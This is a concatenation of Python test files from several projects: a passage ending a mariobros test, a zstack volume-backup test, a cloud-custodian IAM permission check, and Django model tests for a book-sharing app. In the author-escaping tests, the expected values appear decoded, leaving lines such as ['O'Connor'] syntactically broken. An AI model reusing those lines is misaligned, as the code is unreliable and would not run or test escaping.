cwd=os.path.join(
str(mario_folder.dirname), 'tmpdir'
))
assert parsed_mariofile_include == parsed_mariofile_multiple_include
| bopen/mariobros | tests/test_mariofile.py | Python | apache-2.0 | 6,933 |
# -*- coding:utf-8 -*-
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
volume = test_lib.lib_get_specific_stub('e2e_mini/volume', 'volume')
volume_ops = None
vm_ops = None
volume_name = 'volume-' + volume.get_time_postfix()
backup_name = 'backup-' + volume.get_time_postfix()
def test():
global volume_ops
volume_ops = volume.VOLUME()
vm = test_lib.lib_get_specific_stub(suite_name='e2e_mini/vm', specific_name='vm')
vm_ops = vm.VM(uri=volume_ops.uri, initialized=True)
vm_ops.create_vm()
volume_ops.create_volume(volume_name)
volume_ops.volume_attach_to_vm(vm_ops.vm_name)
volume_ops.create_backup(volume_name, 'volume', backup_name)
vm_ops.vm_ops(vm_ops.vm_name, action='stop')
volume_ops.restore_backup(volume_name, 'volume', backup_name)
volume_ops.delete_backup(volume_name, 'volume', backup_name)
volume_ops.check_browser_console_log()
test_util.test_pass('Test Volume Create, Restore and Delete Backups Successful')
def env_recover():
global volume_ops
vm_ops.expunge_vm()
volume_ops.expunge_volume(volume_name)
volume_ops.close()
#Will be called only if exception happens in test().
def error_cleanup():
global volume_ops
try:
vm_ops.expunge_vm()
volume_ops.expunge_volume(volume_name)
volume_ops.close()
except:
pass
| zstackio/zstack-woodpecker | integrationtest/vm/e2e_mini/volume/test_volume_backup.py | Python | apache-2.0 | 1,389 |
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .common import BaseTest, load_data
from c7n.config import Config, Bag
from c7n import manager
import fnmatch
class TestIamGen(BaseTest):
def check_permissions(self, perm_db, perm_set, path):
invalid = []
for p in perm_set:
if ':' not in p:
invalid.append(p)
continue
s, a = p.split(':', 1)
if s not in perm_db:
invalid.append(p)
continue
if '*' in a:
if not fnmatch.filter(perm_db[s], a):
invalid.append(p)
continue
elif a not in perm_db[s]:
invalid.append(p)
if not invalid:
return []
return [(path, invalid)]
def test_iam_permissions_validity(self):
cfg = Config.empty()
missing = set()
all_invalid = []
perms = load_data('iam-actions.json')
for k, v in manager.resources.items():
p = Bag({'name': 'permcheck', 'resource': k, 'provider_name': 'aws'})
ctx = self.get_context(config=cfg, policy=p)
mgr = v(ctx, p)
invalid = []
# if getattr(mgr, 'permissions', None):
# print(mgr)
found = False
for s in (mgr.resource_type.service,
getattr(mgr.resource_type, 'permission_prefix', None)):
if s in perms:
found = True
if not found:
missing.add("%s->%s" % (k, mgr.resource_type.service))
continue
invalid.extend(self.check_permissions(perms, mgr.get_permissions(), k))
for n, a in v.action_registry.items():
p['actions'] = [n]
invalid.extend(
self.check_permissions(
perms, a({}, mgr).get_permissions(),
"{k}.actions.{n}".format(k=k, n=n)))
for n, f in v.filter_registry.items():
if n in ('or', 'and', 'not', 'missing'):
continue
p['filters'] = [n]
invalid.extend(
self.check_permissions(
perms, f({}, mgr).get_permissions(),
"{k}.filters.{n}".format(k=k, n=n)))
if invalid:
for k, perm_set in invalid:
perm_set = [i for i in perm_set
if not i.startswith('elasticloadbalancing')]
if perm_set:
all_invalid.append((k, perm_set))
if missing:
raise ValueError(
"resources missing service %s" % ('\n'.join(sorted(missing))))
if all_invalid:
raise ValueError(
"invalid permissions \n %s" % ('\n'.join(sorted(map(str, all_invalid)))))
| kapilt/cloud-custodian | tests/test_iamgen.py | Python | apache-2.0 | 3,515 |
# -*- coding: utf-8 -*-
import copy
import os
from django.contrib import auth
from django.contrib.auth.models import User
from django.core.files.uploadedfile import SimpleUploadedFile
from django.db.models import QuerySet
from django.test import TestCase, Client, mock
from django.urls import reverse
from ..forms import AddBookForm
from ..models import (TheUser, Category, Author, Language, Book,
AddedBook, BookRating, BookComment, Post, SupportMessage, BookRelatedData)
from .utils import Utils
TEST_DIR = os.path.dirname(os.path.abspath(__file__))
TEST_DATA_DIR = os.path.join(TEST_DIR, 'fixtures')
# ----------------------------------------------------------------------------------------------------------------------
class ModelTest(TestCase):
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setUpTestData(cls):
cls.setup_users()
cls.setup_categories()
cls.setup_authors()
cls.setup_languages()
cls.setup_books()
cls.setup_added_books()
cls.setup_book_rating()
cls.setup_book_comment()
cls.setup_post_messages()
cls.setup_support_messages()
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_users(cls):
client = Client()
cls.anonymous_user = auth.get_user(client)
cls.user1 = User.objects.create_user('user1', '[email protected]', 'testpassword1')
cls.user2 = User.objects.create_user('user2', '[email protected]', 'testpassword2')
cls.user3 = User.objects.create_user('user3', '[email protected]', 'testpassword3')
cls.user4 = User.objects.create_user('user4', '[email protected]', 'testpassword4')
cls.user5 = User.objects.create_user('user5', '[email protected]', 'testpassword5')
cls.user6 = User.objects.create_user('user6', '[email protected]', 'testpassword6')
cls.the_user1 = TheUser.objects.get(id_user=cls.user1)
cls.the_user2 = TheUser.objects.get(id_user=cls.user2)
cls.the_user5 = TheUser.objects.get(id_user=cls.user5)
cls.the_user6 = TheUser.objects.get(id_user=cls.user6)
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_categories(cls):
cls.category1 = Category.objects.create(category_name='category1')
cls.category2 = Category.objects.create(category_name='category2')
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_authors(cls):
cls.author1 = Author.objects.create(author_name='Best Author 1')
cls.author2 = Author.objects.create(author_name='trueAuthorNew')
cls.author3 = Author.objects.create(author_name='zlast author')
cls.author4 = Author.objects.create(author_name='<AuthorSpecialSymbols>&"')
cls.author5 = Author.objects.create(author_name="O'Connor")
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_languages(cls):
cls.language_en = Language.objects.create(language='English')
cls.language_ru = Language.objects.create(language='Russian')
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_books(cls):
test_book_path = os.path.join(TEST_DATA_DIR, 'test_book.pdf')
test_book_image_path = os.path.join(TEST_DATA_DIR, 'test_book_image.png')
books_setup = [
{
'name': 'First Book',
'author': cls.author1,
'category': cls.category1,
'language': cls.language_en,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'photo': SimpleUploadedFile('test_book_image.png', open(test_book_image_path, 'rb').read()),
'who_added': cls.the_user1,
'private': True
},
{
'name': 'Second Book',
'author': cls.author2,
'category': cls.category1,
'language': cls.language_en,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'who_added': cls.the_user2,
'blocked_book': True
},
{
'name': 'Third Book',
'author': cls.author2,
'category': cls.category1,
'language': cls.language_ru,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'photo': SimpleUploadedFile('test_book_image.png', open(test_book_image_path, 'rb').read()),
'who_added': cls.the_user1,
'blocked_book': True
},
{
'name': 'Fourth Book',
'author': cls.author1,
'category': cls.category1,
'language': cls.language_ru,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'photo': SimpleUploadedFile('test_book_image.png', open(test_book_image_path, 'rb').read()),
'who_added': cls.the_user2,
'blocked_book': True
},
{
'name': 'Fifth Book',
'author': cls.author1,
'category': cls.category2,
'language': cls.language_ru,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'who_added': cls.the_user1,
'private': True
},
{
'name': 'Sixth Book',
'author': cls.author2,
'category': cls.category2,
'language': cls.language_en,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'photo': SimpleUploadedFile('test_book_image.png', open(test_book_image_path, 'rb').read()),
'who_added': cls.the_user2
},
{
'name': 'Seventh Book<>&"',
'author': cls.author4,
'category': cls.category2,
'language': cls.language_en,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'photo': SimpleUploadedFile('test_book_image.png', open(test_book_image_path, 'rb').read()),
'who_added': cls.the_user2
}
]
for book in books_setup:
Book.objects.create(
book_name=book['name'],
id_author=book['author'],
id_category=book['category'],
description='TEST description',
language=book['language'],
book_file=book['file'],
photo=book.get('photo', False),
who_added=book['who_added'],
private_book=book.get('private', False),
blocked_book=book.get('blocked_book', False)
)
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_added_books(cls):
AddedBook.objects.create(id_user=cls.the_user1, id_book=Book.objects.get(book_name='Third Book'))
AddedBook.objects.create(id_user=cls.the_user1, id_book=Book.objects.get(book_name='Sixth Book'))
AddedBook.objects.create(id_user=cls.the_user1, id_book=Book.objects.get(book_name='Fourth Book'))
AddedBook.objects.create(id_user=cls.the_user2, id_book=Book.objects.get(book_name='Third Book'))
AddedBook.objects.create(id_user=cls.the_user2, id_book=Book.objects.get(book_name='Sixth Book'))
AddedBook.objects.create(id_user=cls.the_user2, id_book=Book.objects.get(book_name='Second Book'))
AddedBook.objects.create(id_user=cls.the_user5, id_book=Book.objects.get(book_name='Sixth Book'))
AddedBook.objects.create(id_user=cls.the_user6, id_book=Book.objects.get(book_name='Sixth Book'))
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_book_rating(cls):
BookRating.objects.create(id_book=Book.objects.get(book_name='Third Book'), id_user=cls.the_user1, rating=10)
BookRating.objects.create(id_book=Book.objects.get(book_name='Third Book'), id_user=cls.the_user2, rating=5)
BookRating.objects.create(id_book=Book.objects.get(book_name='Third Book'), id_user=cls.the_user5, rating=3)
BookRating.objects.create(id_book=Book.objects.get(book_name='Fourth Book'), id_user=cls.the_user1, rating=7)
BookRating.objects.create(id_book=Book.objects.get(book_name='Sixth Book'), id_user=cls.the_user1, rating=4)
BookRating.objects.create(id_book=Book.objects.get(book_name='Second Book'), id_user=cls.the_user2, rating=7)
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_book_comment(cls):
second_book = Book.objects.get(book_name='Second Book')
third_book = Book.objects.get(book_name='Third Book')
fourth_book = Book.objects.get(book_name='Fourth Book')
BookComment.objects.create(id_book=second_book, id_user=cls.the_user1, text='Test book 2 user 1')
BookComment.objects.create(id_book=second_book, id_user=cls.the_user2, text='Test book 2 user 2')
BookComment.objects.create(id_book=third_book, id_user=cls.the_user1, text='Test book 3 user 1')
BookComment.objects.create(id_book=fourth_book, id_user=cls.the_user1, text='Test book 4 user 1')
BookComment.objects.create(id_book=fourth_book, id_user=cls.the_user5, text='Test book 4 user 5')
# ------------------------------------------------------------------------------------------------------------------
@classmethod
@mock.patch('app.signals.email_dispatch.apply_async', new=mock.Mock())
def setup_post_messages(cls):
Post.objects.create(user=cls.the_user1, heading='post 1', text='Posted test text 1')
Post.objects.create(user=cls.the_user1, heading='post 2', text='Posted test text 2')
Post.objects.create(user=cls.the_user2, heading='post 3', text='Posted test text 3')
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_support_messages(cls):
SupportMessage.objects.create(email='[email protected]', text='Test text1')
SupportMessage.objects.create(email='[email protected]', text='Test text2')
SupportMessage.objects.create(email='[email protected]', text='Test text3')
SupportMessage.objects.create(email='[email protected]', text='Test text4')
# ------------------------------------------------------------------------------------------------------------------
def test_the_user_str(self):
self.assertEqual(str(self.the_user1), 'user1')
self.assertEqual(str(self.the_user2), 'user2')
# ------------------------------------------------------------------------------------------------------------------
def test_creating_the_user_objects(self):
"""
Must create 'app.models.TheUser' instance after django User instance was created.
"""
self.assertEqual(User.objects.all().count(), 6)
self.assertEqual(User.objects.all().count(), TheUser.objects.all().count())
self.assertNotEqual(self.the_user1.auth_token, '')
self.assertNotEqual(self.the_user1.auth_token, self.the_user2.auth_token)
# ------------------------------------------------------------------------------------------------------------------
def test_the_user_get_api_reminders(self):
reminders = self.the_user1.get_api_reminders()
reminders_keys_correct = ['vk', 'fb_group', 'fb_page', 'twitter', 'disabled_all', 'app_rate']
self.assertTrue(isinstance(reminders, dict))
self.assertEqual(sorted(list(reminders.keys())), sorted(reminders_keys_correct))
# ------------------------------------------------------------------------------------------------------------------
def test_the_user_get_web_reminders(self):
reminders = self.the_user1.get_web_reminders()
reminders_keys_correct = ['vk', 'fb_group', 'fb_page', 'twitter', 'disabled_all', 'app_download']
self.assertTrue(isinstance(reminders, dict))
self.assertEqual(sorted(list(reminders.keys())), sorted(reminders_keys_correct))
# ------------------------------------------------------------------------------------------------------------------
def test_the_user_update_reminder(self):
reminders = self.the_user1.get_web_reminders()
self.assertTrue(isinstance(reminders, dict))
self.assertEqual(reminders['vk'], True)
self.assertEqual(reminders['app_download'], True)
self.the_user1.update_reminder('vk', False)
self.the_user1.update_reminder('app_download', False)
updated_reminders = self.the_user1.get_web_reminders()
self.assertTrue(isinstance(updated_reminders, dict))
self.assertEqual(updated_reminders['vk'], False)
self.assertEqual(updated_reminders['app_download'], False)
# ------------------------------------------------------------------------------------------------------------------
def test_removing_user_objects(self):
"""
Must remove django User instance after 'app.models.TheUser' objects was deleted.
"""
the_user3 = TheUser.objects.get(id_user__username='user3')
the_user4 = TheUser.objects.get(id_user__email='[email protected]')
the_user3.delete()
the_user4.delete()
self.assertEqual(User.objects.all().count(), 4)
self.assertEqual(User.objects.all().count(), TheUser.objects.all().count())
# ------------------------------------------------------------------------------------------------------------------
def test_created_categories(self):
self.assertEqual(Category.objects.all().count(), 2)
self.assertNotEqual(self.category1, self.category2)
# ------------------------------------------------------------------------------------------------------------------
def test_categories_str(self):
self.assertEqual(str(self.category1), 'category1')
self.assertEqual(str(self.category2), 'category2')
# ------------------------------------------------------------------------------------------------------------------
def test_created_authors(self):
self.assertEqual(Author.objects.all().count(), 5)
self.assertNotEqual(self.author1, self.author2)
# ------------------------------------------------------------------------------------------------------------------
def test_get_authors_list(self):
"""
Must return authors list depending on different letters/letter case/words/symbols.
"""
self.assertEqual(Author.get_authors_list('bEst'), ['Best Author 1'])
self.assertEqual(Author.get_authors_list('1'), ['Best Author 1'])
self.assertEqual(Author.get_authors_list(' '), ['Best Author 1', 'zlast author'])
self.assertEqual(Author.get_authors_list('new'), ['trueAuthorNew'])
self.assertEqual(Author.get_authors_list('TRUE'), ['trueAuthorNew'])
self.assertEqual(Author.get_authors_list('Best Author 1'), ['Best Author 1'])
self.assertEqual(Author.get_authors_list('trueAuthorNew'), ['trueAuthorNew'])
# ------------------------------------------------------------------------------------------------------------------
def test_get_authors_list_with_escaping(self):
self.assertEqual(Author.get_authors_list("'", True), ['O'Connor'])
self.assertEqual(Author.get_authors_list("Connor", True), ['O'Connor'])
self.assertEqual(
Author.get_authors_list('b', True),
['Best Author 1', '<AuthorSpecialSymbols>&"']
)
self.assertEqual(
Author.get_authors_list('e', True),
['Best Author 1', 'trueAuthorNew', '<AuthorSpecialSymbols>&"']
)
self.assertEqual(
Author.get_authors_list('author', True),
['Best Author 1', 'trueAuthorNew', 'zlast author', '<AuthorSpecialSymbols>&"']
)
# ------------------------------------------------------------------------------------------------------------------
def test_get_authors_list_without_escaping(self):
self.assertEqual(Author.get_authors_list("'"), ["O'Connor"])
self.assertEqual(Author.get_authors_list("Connor", False), ["O'Connor"])
self.assertEqual(Author.get_authors_list('b'), ['Best Author 1', '<AuthorSpecialSymbols>&"'])
self.assertEqual(
Author.get_authors_list('e'),
['Best Author 1', 'trueAuthorNew', '<AuthorSpecialSymbols>&"']
)
self.assertEqual(
Author.get_authors_list('author', False),
['Best Author 1', 'trueAuthorNew', 'zlast author', '<AuthorSpecialSymbols>&"']
)
# ------------------------------------------------------------------------------------------------------------------
def test_created_language(self):
self.assertEqual(Language.objects.all().count(), 2)
self.assertNotEqual(self.author1, self.author2)
# ------------------------------------------------------------------------------------------------------------------
def test_created_books(self):
books = Book.objects.all()
self.assertEqual(books.count(), 7)
self.assertEqual(books.filter(private_book=True).count(), 2)
self.assertEqual(books.filter(id_category=self.category1).count(), 4)
self.assertEqual(books.filter(id_author=self.author1).count(), 3)
self.assertEqual(books.filter(language=self.language_en).count(), 4)
self.assertEqual(books.filter(photo=False).count(), 2)
self.assertEqual(books.filter(who_added=self.the_user1).count(), 3)
self.assertEqual(books.filter(id_category=self.category2, id_author=self.author2).count(), 1)
self.assertEqual(books.filter(id_category=self.category1,
id_author=self.author2,
language=self.language_ru,
who_added=self.the_user1).count(), 1)
self.assertEqual(books.filter(id_category=self.category1,
id_author=self.author2,
language=self.language_ru,
who_added=self.the_user2).count(), 0)
self.assertEqual(books.filter(blocked_book=True).count(), 3)
# ------------------------------------------------------------------------------------------------------------------
def test_get_related_objects_for_create(self):
test_book_path = os.path.join(TEST_DATA_DIR, 'test_book.pdf')
form_data = {
'bookname': 'The new book',
'author': 'trueAuthorNew',
'category': 'category1',
'language': 'English',
'about': 'about book',
'bookfile': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
}
form_data_new_author = copy.deepcopy(form_data)
form_data_new_author['author'] = 'super new author'
self.assertEqual(Author.objects.all().count(), 5)
form = AddBookForm(data=form_data)
form.is_valid()
form_with_new_author = AddBookForm(data=form_data_new_author)
form_with_new_author.is_valid()
related_data = Book.get_related_objects_for_create(self.user1.id, form)
self.assertTrue(isinstance(related_data, BookRelatedData))
self.assertEqual(len(related_data), 4)
self.assertEqual(related_data.author, Author.objects.get(author_name='trueAuthorNew'))
self.assertEqual(Author.objects.all().count(), 5)
related_data_new_author = Book.get_related_objects_for_create(self.user1.id, form_with_new_author)
self.assertTrue(isinstance(related_data, BookRelatedData))
self.assertEqual(len(related_data_new_author), 4)
self.assertEqual(related_data_new_author.author, Author.objects.get(author_name='super new author'))
self.assertEqual(Author.objects.all().count(), 6)
# ------------------------------------------------------------------------------------------------------------------
def test_get_related_objects_create_api(self):
"""
Must generate Book related data when creates a Book object for API calls.
New author must be returned if it's name not present in the Author model.
"""
test_data = {'author': 'trueAuthorNew', 'category': 'category2', 'language': 'Russian'}
test_data_new_author = {'author': 'NEW AUTHOR', 'category': 'category1', 'language': 'English'}
self.assertEqual(
Book.get_related_objects_create_api(self.the_user1, test_data),
BookRelatedData(self.author2, self.category2, self.language_ru, None)
)
self.assertEqual(Author.objects.all().count(), 5)
self.assertEqual(
Book.get_related_objects_create_api(self.the_user1, test_data_new_author),
BookRelatedData(Author.objects.get(author_name='NEW AUTHOR'), self.category1, self.language_en, None)
)
self.assertEqual(Author.objects.all().count(), 6)
# ------------------------------------------------------------------------------------------------------------------
def test_get_related_objects_selected_book_unknown_user(self):
"""
Must generate selected book related data for unknown (anonymous) users.
"""
third_book = Book.objects.get(book_name='Third Book')
sixth_book = Book.objects.get(book_name='Sixth Book')
self.assertTrue(isinstance(Book.get_related_objects_selected_book(self.anonymous_user, third_book.id), dict))
related_third_book = Book.get_related_objects_selected_book(self.anonymous_user, third_book.id)
related_sixth_book = Book.get_related_objects_selected_book(self.anonymous_user, sixth_book.id)
self.assertEqual(related_third_book['book'], third_book)
self.assertEqual(related_third_book['avg_book_rating'], {'rating__avg': 6.0})
self.assertEqual(related_third_book['book_rating_count'], 3)
self.assertEqual(related_third_book['added_book'], None)
self.assertEqual(related_third_book['comments'].count(), 1)
self.assertEqual(related_third_book['comments'][0],
BookComment.objects.filter(id_book=third_book).order_by('-id')[0])
self.assertEqual(related_sixth_book['book'], sixth_book)
self.assertEqual(related_sixth_book['avg_book_rating'], {'rating__avg': 4.0})
self.assertEqual(related_sixth_book['book_rating_count'], 1)
self.assertEqual(related_sixth_book['added_book'], None)
self.assertEqual(related_sixth_book['comments'].count(), 0)
AddedBook.objects.create(id_user=self.the_user5, id_book=third_book)
BookRating.objects.create(id_user=self.the_user6, id_book=third_book, rating=10)
BookComment.objects.create(id_user=self.the_user6, id_book=third_book, text='TEST TEXT 2')
related_third_book = Book.get_related_objects_selected_book(self.anonymous_user, third_book.id)
self.assertEqual(related_third_book['book'], third_book)
self.assertEqual(related_third_book['avg_book_rating'], {'rating__avg': 7.0})
self.assertEqual(related_third_book['book_rating_count'], 4)
self.assertEqual(related_third_book['added_book'], None)
self.assertEqual(related_third_book['comments'].count(), 2)
# ------------------------------------------------------------------------------------------------------------------
def test_get_related_objects_selected_book_added_user(self):
"""
This case is testing only 'added_book' param, because for
user who is reading the book only this attribute will change relatively to function above.
"""
third_book = Book.objects.get(book_name='Third Book')
sixth_book = Book.objects.get(book_name='Sixth Book')
self.assertTrue(isinstance(Book.get_related_objects_selected_book(self.the_user1.id_user, third_book.id), dict))
related_third_book = Book.get_related_objects_selected_book(self.the_user1.id_user, third_book.id)
related_sixth_book = Book.get_related_objects_selected_book(self.the_user1.id_user, sixth_book.id)
self.assertEqual(related_third_book['added_book'],
AddedBook.objects.get(id_book=third_book, id_user=self.the_user1))
self.assertEqual(related_sixth_book['added_book'],
AddedBook.objects.get(id_book=sixth_book, id_user=self.the_user1))
# ------------------------------------------------------------------------------------------------------------------
def test_get_related_objects_selected_book_with_user_key(self):
"""
Tests returning data for related objects for selected book with 'user_key' attribute, meaning that
user is anonymous (i.e. not logged) but with using user key. Done for API requests access.
"""
third_book = Book.objects.get(book_name='Third Book')
related_third_book = Book.get_related_objects_selected_book(
self.anonymous_user, third_book.id, self.the_user1.auth_token
)
self.assertEqual(related_third_book['book'], third_book)
self.assertEqual(related_third_book['avg_book_rating'], {'rating__avg': 6.0})
self.assertEqual(related_third_book['book_rating_count'], 3)
self.assertEqual(related_third_book['added_book'],
AddedBook.objects.get(id_book=third_book, id_user=self.the_user1))
self.assertEqual(related_third_book['comments'].count(), 1)
self.assertEqual(related_third_book['comments'][0],
BookComment.objects.filter(id_book=third_book).order_by('-id')[0])
# ------------------------------------------------------------------------------------------------------------------
def test_sort_by_book_name_category1(self):
"""
Must generate correct dictionaries for anonymous users, users with private books and without.
Testing first category.
"""
first_book = Book.objects.get(book_name='First Book')
third_book = Book.objects.get(book_name='Third Book')
fourth_book = Book.objects.get(book_name='Fourth Book')
first_book_dict = Utils.generate_sort_dict(first_book)
third_book_dict = Utils.generate_sort_dict(third_book)
fourth_book_dict = Utils.generate_sort_dict(fourth_book)
self.assertTrue(isinstance(Book.sort_by_book_name(self.anonymous_user, self.category1), list))
self.assertEqual(len(Book.sort_by_book_name(self.anonymous_user, self.category1)), 3)
self.assertEqual(Book.sort_by_book_name(self.anonymous_user, self.category1)[0], fourth_book_dict)
self.assertEqual(Book.sort_by_book_name(self.anonymous_user, self.category1)[2], third_book_dict)
self.assertEqual(len(Book.sort_by_book_name(self.the_user2.id_user, self.category1)), 3)
self.assertEqual(Book.sort_by_book_name(self.the_user2.id_user, self.category1)[0], fourth_book_dict)
self.assertEqual(Book.sort_by_book_name(self.the_user2.id_user, self.category1)[2], third_book_dict)
self.assertEqual(len(Book.sort_by_book_name(self.the_user1.id_user, self.category1)), 4)
self.assertEqual(Book.sort_by_book_name(self.the_user1.id_user, self.category1)[0], first_book_dict)
self.assertEqual(Book.sort_by_book_name(self.the_user1.id_user, self.category1)[3], third_book_dict)
# ------------------------------------------------------------------------------------------------------------------
def test_sort_by_book_name_category2(self):
"""
Must generate correct dictionaries for anonymous users, users with private books and without.
Testing first category.
"""
fifth_book = Book.objects.get(book_name='Fifth Book')
seventh_book = Book.objects.get(book_name='Seventh Book<>&"')
fifth_book_dict = Utils.generate_sort_dict(fifth_book)
seventh_book_dict = Utils.generate_sort_dict(seventh_book)
self.assertEqual(len(Book.sort_by_book_name(self.anonymous_user, self.category2)), 2)
self.assertEqual(Book.sort_by_book_name(self.anonymous_user, self.category2)[0], seventh_book_dict)
self.assertEqual(len(Book.sort_by_book_name(self.the_user2.id_user, self.category2)), 2)
self.assertEqual(Book.sort_by_book_name(self.the_user2.id_user, self.category2)[0], seventh_book_dict)
self.assertEqual(len(Book.sort_by_book_name(self.the_user1.id_user, self.category2)), 3)
self.assertEqual(Book.sort_by_book_name(self.the_user1.id_user, self.category2)[0], fifth_book_dict)
self.assertEqual(Book.sort_by_book_name(self.the_user1.id_user, self.category2)[1], seventh_book_dict)
# ------------------------------------------------------------------------------------------------------------------
def test_sort_by_author_category1(self):
"""
Must generate correct dictionaries for anonymous users, users with private books and without.
Testing returned book authors at first category.
"""
self.assertTrue(isinstance(Book.sort_by_author(self.anonymous_user, self.category1), list))
self.assertEqual(len(Book.sort_by_author(self.anonymous_user, self.category1)), 3)
self.assertEqual(Book.sort_by_author(self.anonymous_user, self.category1)[0]['author'],
self.author1.author_name)
self.assertEqual(Book.sort_by_author(self.anonymous_user, self.category1)[2]['author'],
self.author2.author_name)
self.assertEqual(len(Book.sort_by_author(self.the_user2.id_user, self.category1)), 3)
self.assertEqual(Book.sort_by_author(self.the_user2.id_user, self.category1)[0]['author'],
self.author1.author_name)
self.assertEqual(Book.sort_by_author(self.the_user2.id_user, self.category1)[2]['author'],
self.author2.author_name)
self.assertEqual(len(Book.sort_by_author(self.the_user1.id_user, self.category1)), 4)
self.assertEqual(Book.sort_by_author(self.the_user1.id_user, self.category1)[0]['author'],
self.author1.author_name)
self.assertEqual(Book.sort_by_author(self.the_user1.id_user, self.category1)[3]['author'],
self.author2.author_name)
# ------------------------------------------------------------------------------------------------------------------
def test_sort_by_author_category2(self):
"""
Must generate correct dictionaries for anonymous users, users with private books and without.
Testing returned book authors at second category.
"""
escaped_author_name = '<AuthorSpecialSymbols>&"'
self.assertEqual(len(Book.sort_by_author(self.anonymous_user, self.category2)), 2)
self.assertEqual(Book.sort_by_author(self.anonymous_user, self.category2)[0]['author'], escaped_author_name)
self.assertEqual(len(Book.sort_by_author(self.the_user2.id_user, self.category2)), 2)
self.assertEqual(Book.sort_by_author(self.the_user2.id_user, self.category2)[0]['author'], escaped_author_name)
self.assertEqual(len(Book.sort_by_author(self.the_user1.id_user, self.category2)), 3)
self.assertEqual(Book.sort_by_author(self.the_user1.id_user, self.category2)[0]['author'], escaped_author_name)
self.assertEqual(Book.sort_by_author(self.the_user1.id_user, self.category2)[1]['author'],
self.author1.author_name)
# ------------------------------------------------------------------------------------------------------------------
def test_sort_by_estimation_category1(self):
"""
Must generate correct dictionaries for anonymous users, users with private books and without.
Testing returned book rating at first category.
"""
self.assertTrue(isinstance(Book.sort_by_estimation(self.anonymous_user, self.category1), list))
self.assertEqual(len(Book.sort_by_estimation(self.anonymous_user, self.category1)), 3)
self.assertEqual(Book.sort_by_estimation(self.anonymous_user, self.category1)[0]['rating'], 7)
self.assertEqual(Book.sort_by_estimation(self.anonymous_user, self.category1)[2]['rating'], 6)
self.assertEqual(len(Book.sort_by_estimation(self.the_user2.id_user, self.category1)), 3)
self.assertEqual(Book.sort_by_estimation(self.the_user2.id_user, self.category1)[0]['rating'], 7)
self.assertEqual(Book.sort_by_estimation(self.the_user2.id_user, self.category1)[2]['rating'], 6)
self.assertEqual(len(Book.sort_by_estimation(self.the_user1.id_user, self.category1)), 4)
self.assertEqual(Book.sort_by_estimation(self.the_user1.id_user, self.category1)[0]['rating'], 7)
self.assertEqual(Book.sort_by_estimation(self.the_user1.id_user, self.category1)[2]['rating'], 6)
# ------------------------------------------------------------------------------------------------------------------
def test_sort_by_estimation_category2(self):
"""
Must generate correct dictionaries for anonymous users, users with private books and without.
Testing returned book rating at second category.
"""
self.assertEqual(len(Book.sort_by_estimation(self.anonymous_user, self.category2)), 2)
self.assertEqual(Book.sort_by_estimation(self.anonymous_user, self.category2)[0]['rating'], 4)
self.assertEqual(len(Book.sort_by_estimation(self.the_user2.id_user, self.category2)), 2)
self.assertEqual(Book.sort_by_estimation(self.the_user2.id_user, self.category2)[0]['rating'], 4)
self.assertEqual(len(Book.sort_by_estimation(self.the_user1.id_user, self.category2)), 3)
self.assertEqual(Book.sort_by_estimation(self.the_user1.id_user, self.category2)[0]['rating'], 4)
self.assertEqual(Book.sort_by_estimation(self.the_user1.id_user, self.category2)[1]['rating'], None)
# ------------------------------------------------------------------------------------------------------------------
def test_sort_by_readable(self):
"""
Must generate correct data by most readable books for anonymous users and users with private books.
Testing count of sorted books with and without selected categories.
"""
sorted_structure = Book.sort_by_readable(self.anonymous_user, self.category1)
self.assertTrue(isinstance(sorted_structure, list))
self.assertTrue(isinstance(sorted_structure[0], dict))
self.assertEqual(set(sorted_structure[0].keys()), {'id', 'name', 'author', 'url'})
self.assertEqual(len(Book.sort_by_readable(user=self.anonymous_user, category=self.category1)), 3)
self.assertEqual(len(Book.sort_by_readable(user=self.anonymous_user, category=self.category1, count=2)), 2)
self.assertEqual(len(Book.sort_by_readable(user=self.the_user1.id_user, category=self.category1)), 3)
self.assertEqual(len(Book.sort_by_readable(user=self.the_user1.id_user, category=self.category1, count=2)), 2)
self.assertEqual(len(Book.sort_by_readable(user=self.the_user2.id_user, category=self.category1)), 3)
self.assertEqual(len(Book.sort_by_readable(user=self.the_user2.id_user, category=self.category1, count=2)), 2)
self.assertEqual(len(Book.sort_by_readable(user=self.anonymous_user)), 4)
self.assertEqual(len(Book.sort_by_readable(user=self.anonymous_user, count=2)), 2)
self.assertEqual(len(Book.sort_by_readable(user=self.the_user1.id_user)), 4)
self.assertEqual(len(Book.sort_by_readable(user=self.the_user1.id_user, count=3)), 3)
self.assertEqual(len(Book.sort_by_readable(user=self.the_user2.id_user)), 4)
self.assertEqual(len(Book.sort_by_readable(user=self.the_user2.id_user, count=2)), 2)
# ------------------------------------------------------------------------------------------------------------------
def test_generate_books(self):
"""
Must generate correct dictionaries for Book data.
"""
books = Book.objects.all()
self.assertTrue(isinstance(Book.generate_books(books), list))
self.assertEqual(len(Book.generate_books(books)), 7)
